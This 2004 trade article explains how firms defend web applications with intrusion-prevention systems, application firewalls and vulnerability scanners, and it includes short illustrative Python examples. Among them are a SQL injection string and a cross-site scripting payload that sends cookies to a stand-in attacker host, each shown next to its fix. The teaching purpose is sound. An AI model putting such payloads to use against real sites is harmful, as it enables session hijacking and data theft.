by Paul Desmond

All-out blitz against Web app attacks

How-To
May 17, 2004 | 12 mins
Hacking, Networking, Security

Armed with Web application firewalls, intrusion-protection systems and vulnerability scanners, companies can defend against app-level cyberattacks.

After nearly 20 years of selling software to the financial services industry, Baker Hill decided two years ago to become an application service provider, offering access to its programs over the Web.

To support the new offering, the company built a Web infrastructure using Microsoft technology, including the Internet Information Server (IIS) Web server, Active Directory and SQL Server 2000, says Eric Beasley, senior network administrator for Baker Hill, in Carmel, Ind. That technology choice didn’t sit well with some large clients, who had read about the Nimda and Code Red attacks that targeted Microsoft platforms. “We had clients who ultimately decided they would not do business with us unless we could find a way to secure that Microsoft environment,” Beasley says.

Such concerns are well founded because applications are becoming the prime target for cyberattacks. Experts say firewalls are doing an adequate job of protecting against common network-layer attacks, and operating system vendors have cleaned up most of their well-known vulnerabilities. “The application layer is increasingly what’s left,” says Scott Blake, vice president of information security for BindView.

Another reason applications are an attractive target is there’s no shortage of vulnerabilities to go after, and most require little expertise to exploit, says John Pescatore, an analyst at Gartner.

Since 2002, Gartner research shows that 70% of all successful attacks have exploited application vulnerabilities. “If you take into account Slammer, Blaster and others that happened last year, it’s probably up to 90% now,” he says. Pescatore says the problems being exploited fall into two classes: defects for which a patch has been issued (about 35%) and misconfigured applications (65%).

The hacker playbook

Common exploits look for vulnerabilities that can give the attacker root access to server platforms including Microsoft SQL Server, IIS and occasionally Apache Web servers, says Fred Avolio, president of Avolio Consulting.

Among the most dangerous forms of attack is SQL injection, where an attacker puts unexpected SQL commands into a Web application form field. This could let an attacker execute commands on the back-end database server and, potentially, gain administrator rights. Buffer overflow attacks, which send an application more input than a memory buffer was sized to hold, likewise can give an attacker the ability to execute commands on a target system.
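The mechanics of SQL injection are easy to demonstrate. The following sketch uses Python and an in-memory SQLite database; the table and field names are invented for illustration. Concatenating user input into the query lets the attacker rewrite it, while a bound parameter is treated strictly as data:

```python
# Illustrative sketch of SQL injection and the standard defense:
# parameterized queries. Table and column names are hypothetical.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")

# A value an attacker might type into a Web form field.
malicious = "nobody' OR '1'='1"

# Vulnerable: string concatenation lets the input rewrite the query,
# so every row comes back instead of none.
vulnerable = conn.execute(
    "SELECT name FROM users WHERE name = '" + malicious + "'"
).fetchall()

# Safe: a bound parameter is treated as data, never as SQL syntax.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (malicious,)
).fetchall()

print(vulnerable)   # the whole table leaks
print(safe)         # no rows match
```

The same principle applies to any database API: the query text and the user-supplied values travel separately, so the values can never change the query's structure.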

Other common exploits include cross-site scripting, which Blake says is common in phishing attacks. Cross-site scripting can take various forms, including tricking users into connecting to what appears to be a well-known Web site to collect personal information or taking over a user’s Web session.
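The root cause of cross-site scripting is a page that echoes user input without encoding it. A minimal sketch, using Python's standard `html` module and an invented payload, shows both the hole and the usual fix:

```python
# Sketch of a reflected cross-site scripting hole and the usual fix:
# HTML-escape any user-supplied value before echoing it into a page.
import html

# Script an attacker might smuggle in via a form field or URL parameter.
payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Vulnerable: the raw value lands in the page and the browser executes it.
unsafe_page = "<p>Hello, " + payload + "</p>"

# Safe: escaping turns the markup into inert text.
safe_page = "<p>Hello, " + html.escape(payload) + "</p>"

print(safe_page)
```

Once escaped, the attacker's `<script>` tag renders as harmless text instead of running in the victim's browser.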

Defensive maneuvers

One of the best forms of defense against application-layer attacks is to avoid following the crowd because attackers typically target the most commonly deployed applications. “It’s simply return on investment” from the hacker’s perspective, Blake says. “Deploy less commonly used technology to achieve heterogeneity and become a smaller target.” Similarly, homegrown applications are less likely targets than off-the-shelf programs.

Pescatore is also a proponent of diversity in terms of operating systems and server platforms. “It raises the cost of IT management, but it greatly decreases the odds that you’re going to have a catastrophic outage,” he says.

Another tip is to expose to the Internet only those services that you actually need. Slammer, for example, took advantage of “a lot of SQL Server databases that didn’t need to be exposed to the Internet,” Pescatore says. It’s also a good idea to zone off crucial applications to limit unnecessary exposure to the rest of the corporation. “If a big worm hits my office zone, that’s pretty annoying,” he says. “But if it spreads to the system that schedules the trains, and the trains don’t leave the station, that’s disastrous.”

The zone defense

Douglas Brown, manager of security resources at the University of North Carolina in Chapel Hill, uses an intrusion-prevention appliance from TippingPoint Technologies to segment his network into a dozen zones. Should an infection be introduced into a given zone, the TippingPoint UnityOne 2400 device should keep it contained there, Brown says.

The university was testing the TippingPoint product last August when it was hit by the Welchia worm, which was launched to eradicate the Blaster worm that hit the Internet the previous week. “We saw large parts of our network become unusable, with the exception of the part where we had a TippingPoint unit,” Brown says.

TippingPoint is an example of an intrusion-prevention system (IPS) that relies on a combination of attack signatures and protocol anomaly detection to ward off attacks like Blaster and its variants. At least a month before Blaster, TippingPoint had released a signature to detect any attack against the Remote Procedure Call vulnerability that Blaster (and Welchia) targeted, Brown says.

Unlike intrusion-detection systems (IDS), UnityOne has not given him any problem with false positives, he says. One reason is that the device sits in-line, watching all traffic – an average of 500M bit/sec on one link – and keeping track of entire TCP conversations, to provide context. IDSs such as the freeware Snort typically look only at mirror ports and don’t see all traffic.
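The decision logic of such a device can be caricatured in a few lines. The sketch below is purely illustrative; the signature bytes and the length threshold are invented and bear no relation to TippingPoint's actual rules. It shows the two checks described above, a signature match and a crude protocol-anomaly test, applied in-line to each packet:

```python
# Toy sketch of in-line IPS filtering: signature matching plus a
# simple protocol-anomaly check. The signature and threshold are
# invented stand-ins, not any vendor's real rules.
EXPLOIT_SIG = b"\x41" * 32   # hypothetical pattern for an RPC exploit

def inspect(packet: bytes, max_len: int = 1024) -> str:
    """Return 'drop' if the packet matches a known-bad signature or
    violates a basic sanity check; otherwise 'forward'."""
    if EXPLOIT_SIG in packet:     # signature match
        return "drop"
    if len(packet) > max_len:     # crude anomaly check: oversized payload
        return "drop"
    return "forward"

print(inspect(b"GET /index.html HTTP/1.0"))   # normal traffic passes
print(inspect(b"junk" + EXPLOIT_SIG))         # signature hit is dropped
```

Because the device sits in the traffic path rather than on a mirror port, a "drop" verdict actually stops the packet instead of merely logging it.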

Since last summer, Brown has installed UnityOne throughout campus. “The ROI for us is it has stopped major incidents from impacting our network,” he says. When the Witty worm struck in March, the TippingPoint unit blocked 50,000 packets per hour, making the worm “basically a non-event on this campus,” he says.

Basic blocking and tackling

Another class of product, often called Web application firewalls, seeks to protect applications by only allowing what it deems is legitimate traffic. Brown is testing one such device, from Covelight Systems, while Baker Hill’s Beasley has deployed another, from Teros (formerly Stratum8 Networks).

The Teros Secure Application Gateway “learns” what constitutes normal application behavior and creates rules that define acceptable application use. By default, traffic that does not meet those rules is dropped, Beasley says. If an intruder attempts to inject SQL commands, for example, the Gateway will recognize that as traffic that is outside the norm and disallow it.
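This "positive security model" can be sketched in miniature. The field names and patterns below are invented; in a real gateway the rules would be learned from observed traffic rather than hand-written. The key property is default-deny: anything outside the learned profile is rejected:

```python
# Sketch of a positive security model: only requests matching learned
# per-field rules are allowed; everything else is dropped by default.
# Field names and patterns here are invented for illustration.
import re

# Rules a gateway might "learn" from normal application use.
learned_rules = {
    "username": re.compile(r"^[A-Za-z0-9_]{1,32}$"),
    "zipcode":  re.compile(r"^\d{5}$"),
}

def allow_request(form: dict) -> bool:
    """Default-deny: any unknown field or out-of-profile value is rejected."""
    for field, value in form.items():
        rule = learned_rules.get(field)
        if rule is None or not rule.match(value):
            return False
    return True

print(allow_request({"username": "beasley", "zipcode": "46032"}))       # allowed
print(allow_request({"username": "x' OR '1'='1", "zipcode": "46032"}))  # blocked
```

Note that the SQL injection attempt is blocked without any signature for it: the quote characters simply fall outside the learned profile for a username.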

“The upside is we no longer have to evaluate patches and hot fixes from Microsoft immediately,” Beasley says. “We still do the evaluation process and apply them to our environment, but only after we’ve had time to make sure the patch doesn’t break our Web servers or applications.”

The Teros Gateway also has a Secure Sockets Layer (SSL) acceleration card that offloads CPU-intensive encryption and decryption tasks from Baker Hill’s Web servers. “That allows us to run fewer Web servers than we might otherwise require,” Beasley says. Another benefit is that only one SSL certificate is required, instead of one for each Web server.

Unlike some of the other Web application firewalls Beasley evaluated before making his selection nearly two years ago, Teros lets one appliance run profiles and rule sets specific to different Web applications. One rule forces all visitors to start their session at the logon page, which helps to reduce “forceful browsing,” in which an intruder tries to jump to various parts of the site.
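The forced-entry-point rule works roughly like this sketch, in which the session bookkeeping is hypothetical: a visitor who has not passed through the logon page is bounced back to it, no matter what URL they request:

```python
# Sketch of a rule against "forceful browsing": every session must
# begin at the logon page. The session layout is invented.
LOGON_PAGE = "/logon"

def route(path: str, session: dict) -> str:
    """Return the page to serve. Visitors who have not entered via the
    logon page are redirected there, defeating direct jumps into the site."""
    if path == LOGON_PAGE:
        session["entered_via_logon"] = True
        return LOGON_PAGE
    if session.get("entered_via_logon"):
        return path
    return LOGON_PAGE   # jump attempt blocked

session = {}
print(route("/admin/reports", session))   # direct jump -> sent to /logon
print(route("/logon", session))           # session now properly started
print(route("/admin/reports", session))   # subsequent request allowed
```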

The fear with a Web application firewall – or any device that automatically blocks traffic – is that it might block legitimate traffic. Baker Hill goes to great lengths to prevent that scenario, including using the Teros device in its quality assurance department for testing. It also has the device installed at its disaster-recovery site, where it performs still further testing before putting any new application into production.

The strategy is working well enough that Baker Hill has taken its IDS out of production. “I was sick of it constantly crying wolf,” Beasley says. Another big problem he had with the IDS, similar to UNC’s Brown, is that it has trouble seeing all traffic on a fully switched network. You can try to do taps and use mirror ports and on and on, but in the end, “It doesn’t work,” he says.

Pescatore sees different roles for IPS devices and Web application firewalls. The latter, from vendors including Teros, Sanctum, NetContinuum and Kavado, are good at protecting Web servers and applications, but not so good at protecting against worms such as Blaster and Slammer that target specific vulnerabilities. That’s the strong point of IPS devices from vendors including TippingPoint, Network Associates (which acquired IntruVert Networks), NetScreen Technologies, Check Point (InterSpect) and Internet Security Systems, with its Proventia line.

By 2006, Pescatore thinks the IPS function will be incorporated into next-generation firewalls.

The prevent defense

Another tactic is the use of vulnerability scanners during the application development process to catch problems before they are exposed to the world. Initially, customers bought products such as SPI Dynamics’ WebInspect and Kavado’s ScanDo to scan production Web applications. Customers quickly realized that scanning applications during development would nip problems in the bud, and vendors stepped up with interfaces that made their products simple enough for developers to use.

“We put out a research note over a year ago saying it’s time for companies to move vulnerability testing up the food chain,” Pescatore says. “For the clients that have gone that way, it’s proven to be very effective.”

Avolio agrees, noting it’s easy to make mistakes when writing code. A simple typo might not prevent code from compiling and running, but it could create a security vulnerability. An automatic scanner will likely catch it, whereas a manual code review might not, he says.
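A deliberately crude illustration of the idea: a scanner can mechanically flag a risky coding pattern, such as SQL built by string concatenation, that a human reviewer skimming hundreds of files might miss. The heuristic below is a toy, nothing like a commercial product's analysis:

```python
# Toy static check in the spirit of a vulnerability scanner: flag
# source lines that build SQL via string concatenation. The regex is
# deliberately crude and purely illustrative.
import re

CONCAT_SQL = re.compile(r"""(SELECT|INSERT|UPDATE|DELETE)\b.*['"]\s*\+""", re.I)

def scan(source: str) -> list:
    """Return (line number, text) pairs that look like concatenated SQL."""
    hits = []
    for n, line in enumerate(source.splitlines(), start=1):
        if CONCAT_SQL.search(line):
            hits.append((n, line.strip()))
    return hits

code = '''
query = "SELECT * FROM users WHERE name = '" + name + "'"
query = "SELECT * FROM users WHERE name = ?"
'''
print(scan(code))   # flags only the concatenated query
```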

John Dias is certainly a believer in doing vulnerability testing early and often. The senior security analyst with the Computer Incident Advisory Capability (CIAC), which provides incident response for 105 U.S. Department of Energy sites, has conducted penetration tests since 1989. As successful intrusions on Web applications began to creep up about two years ago, he started evaluating vulnerability-testing tools.

Late last year, he evaluated Kavado’s ScanDo and was immediately sold because it is effective at finding vulnerabilities and it’s simple to use. Previously, only one or two staffers had enough security expertise to conduct penetration tests. “Now we have a way of getting more people into it with a very comprehensive tool,” Dias says.

At the same time, the tests are much faster. A typical Web application of 500 pages might take only a couple of hours to scan, he says, down from three to four days with the previous, manual process. “We used to do it manually, filling out spreadsheets – I don’t know if we ever really finished,” he says. “It’s just crazy without some form of automation.”

CIAC is now conducting a few tests per week. “This is the first time I’ve done vulnerability assessments where the developers themselves are excited about the findings,” he says. “They willingly rewrite sections of code that they were iffy about.”

Web services provide significant motivation for Dias’ interest in ScanDo, which can scan Simple Object Access Protocol formats and compare what the Web service is intended to do with what a human operator can try to get away with. “People are starting to deploy Web services, ready or not, so we’re looking into all the security issues of Web services crossing [Department of Energy] sites.”

London Bridge Group, a London developer of financial services software that also hosts applications for clients, is using SPI’s WebInspect to look for vulnerabilities in its Web programs. In addition to validating whether its applications are secure, the tool helps raise the level of security awareness among its developers, says Mark Johnson, London Bridge chief security officer, who is based in its Atlanta data center.

Developers run WebInspect after initially writing and running their code, then fix any security problems before passing the code to quality assurance for functional testing. “They like the idea that it’ll help them create something that they won’t have to fix six months later when we run the [quality assurance] test,” Johnson says.

At the same time, developers learn how to write more secure code from the feedback that WebInspect gives them. “They may do a trick to pass IDs from one page to another that they think is slick, but it opens a cross-site scripting vulnerability,” he says. If WebInspect catches a problem before it goes into production, and the developer learns the trick isn’t so slick after all, that’s good all around.

It also makes good business sense to catch security problems early rather than spend more money to fix them later. In some instances, it’s a business imperative to meet requirements of new regulations such as the Sarbanes-Oxley Act, which puts increased scrutiny on public companies – and their vendors.

Baker Hill, for example, isn’t a public company and thus isn’t technically subject to Sarbanes-Oxley requirements, but many of its clients are. “We have to meet the requirements or we won’t get their business,” Beasley says.

At the same time, 75% of new clients are asking detailed questions about how Baker Hill secures its Microsoft Web infrastructure, up from about 10% two years ago.

And what of those clients that opted not to do business because of security concerns? Says Beasley, “We went back to them and got their business.”

10 most offensive Web application exploits

Authentication hijacking

Unsecure credential and identity management. Result: Account hijacking and theft of service.

Parameter tampering

Modified data sent to Web server. Result: Attacker gains access to all records in database.

Buffer overflow

Attackers flood server with requests that exceed buffer size. Result: Attackers crash and take control of server.

Command injection

Web app passes malicious commands to back-end server. Result: Attackers gain access to data.

Cookie snooping

Attacker decodes user credentials. Result: Attacker can log on as user and gain access to unauthorized information.

SQL injection

Web app passes malicious command to database. Result: Attacker can modify data.

Cookie poisoning

Attacker manipulates cookies passed from server to browser. Result: Attacker can gain access and modify data.

Cross-site scripting

Malicious code is executed when user clicks on a URL. Result: User credentials and information can be stolen.

Invalid parameters

Malicious data accepted without validation. Result: Attacker can hijack client accounts, steal data.

Forceful browsing

Client accesses unauthorized URL. Result: Attacker accesses off-limit directories.